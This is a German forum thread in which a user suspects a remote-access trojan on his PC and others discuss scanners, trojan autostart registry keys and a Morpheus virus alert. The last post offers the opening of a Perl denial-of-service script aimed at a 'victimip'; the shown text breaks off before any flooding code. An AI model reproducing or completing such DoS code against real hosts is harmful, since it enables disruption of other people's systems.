HI
Heut ist meiner Frau etwas passiert.
Auf meinem PC lief WarFTPd 1.80.05 (Dec 7 2000), ZA(Mittelstellung), AntiVir, CD-Open, FreeMem.
Als meine Frau mit M$Word arbeitete schrieb "jemand" etwas in ihren Text mit hinein und danach gingen plötzlich mehrer Fenster automatisch auf, ala "Netbus".
Hab daraufhin zig Viren- und Trojanerscanner über den PC rüberlaufen lassen, aber die haben leider nix gefunden und auch in der ZA-Leiste war kein unbekanntes Programm aufgelistet.
Hab auch keine Freigaben auf der Pladde die evtl. über Netbios gesteuert bzw. erreichbar sein könnten.
Bitte nur kompetente Antworten, kein Kiddiekram.
Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge
>ala "Netbus".
sagst du doch schon selber!
Es gibt mittlerweile zig Remoteserver, die an ZA vorbei arbeiten und die Antiviren- u. Trojanerscannerhersteller schlampen immer hinterher, wie man an dem Y3K Trojaner sieht!
Den Client und/oder der Serverbuilder erkennen diese Dingerchen, aber die sind es ja nicht, welche die Opfer auf ihren Kisten haben! Den packed oder unpacked server, den müssen sie erkennen und das kann die Mehrheit nicht!!!
Hab aufgrund deines Postings auf Y3K geprüft, aber das scheint i.O. z u sein. Dieser Eintrag taucht in meiner Registry nicht auf:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
Explorer32 = C:Win98RundII.exe
siehe auch
http://www.trojaner-info.de/archiv/y3krat_11.html
andere Frage, war deine Frau denn online als die Symptome auftraten?
Ja, sie war online
Aber es war kein Browser geöffnet.
Nur Office/M$ Word
Übriegens hab ich mir y3k runtergeladen --> mein AntiVir meldete sofort Alarm, also geh ich davon aus, dass es dieser Trojaner nicht sein wird.
klingt alles sehr seltsam
>Ja, sie war online
>Aber es war kein Browser geöffnet.
...hat sie eine verbindung hergestellt, oder ist diese von "selbst" gestartet worden?
>Win98Rundll.exe
...das ist keine normale komponente von windows, einen kleinen anhaltspunkt könntest du eventuell bekommen indem du diese datei suchst und in einem acsii-viewer (z.b. notepad) öffnest und nach ascii-zeichenfolgen suchst. die meisten programmierer hinterlassen ihre kennung oder sonstige widmungen im bytecode, eventuell auch ein generator. findest du keinerlei ascii-zeichenfolgen ist dich auch eher verdächtig.
die tatsache daß der scanner nicht anschlägt hat auch nichts zu besagen. wenn der trojaner oder was auch immer es ist neu kompiliert wurde mit geänderten routinen so stimmen auch die kriterien für die heurestische suche nach schadensroutinen nicht mehr, wenn genug geändert wurde.
Ich glaube (hoffe) ich hab den Übeltäter gefunden
Habe heut wieder ein Update von "AntiVir" gemacht und siehe da er hat was gefunden:
--> W95/Kenny.G1
C:\Programme\Morpheus
Morpheus.exe
Enthält Signatur von W95/Kenny.G1
Datei wurde durch Virus zerstört!
Hab noch keine weiteren Infos zu diesem Virus, wer mehr dazu weiss, bitte um Verständigung und v.a. wie kommt dieses Teil auf meinem Rechner ?
>wie kommt dieses Teil auf meinem Rechner ?
so wie jeder andere Virus, deine Frau oder du hat ihn installiert, da geht nun mal kein Weg dran vorbei!
Nachdem ich nun die neuste Version von "Morpheus" runterlud meldete mein "AntiVir" wieder Alarm ?
http://download.cnet.com/downloads/0-1896420-108-76172.html?bt.48575.185
Hat schon mal jemand über Morpheus einen aktuellen Scanner drüberlaufen lassen ?
Da Morpheus ein FileSharingProgramm ist, kann es natürlich sein, daß es Codesignaturen/fragmente hat die einem Virus gleich/ähnlich sind!
Ein Viren-Scanner kann nur eben nach solchen Fingerprints in Dateien suchen, da fällt schon mal das eine oder andere "harmlose" Programm als Virus oder Trojaner auf, was es natürlich nicht ist!
Bei was meldet AntiVir Alarm, bei "Y3K rat 1.6.exe" und/oder "server builder.exe"?
Wenn ja, kannst das getrost in die Tonne treten, wichtig ist das es Alarm schlägt bei der *.exe die du mit dem "server builder" erzeugt hast, denn die ist es die auf den Opferrechner installiert wird und nichts anderes!
Es ginge auch:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\
für jeden Trojaner!
Es wäre außerdem möglich den Trojaner durch jedes andere Windowsprogramm zu starten unabhängig von irgendwelchen Registryeinträgen!
Ich weiß nicht, vielleicht verschweigt das trojaner-info.de einfach?
Welches OS?
Kauf dir ne Firewall.Die kriegst du auch für nix im Inet.Such ma nach ZoneLock oder so.
Achmed
ZA ist eine Firewall ! "Zone Alarm "... :-/
mal ne einfache frage:haste ne funktastatur????
@termito
in der aktuellen Morpheus Variante gibt es keinen Virus oder Trojaner,
die meisten Antivir. Progs erkennen nur anhand von prints das es ein Virus sein könnte.
Laut dem Hersteller von Morpheus soll demnächst ein Update erfolgen, damit dies nicht mehr passieren kann.
morpheus is cool.
try this
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");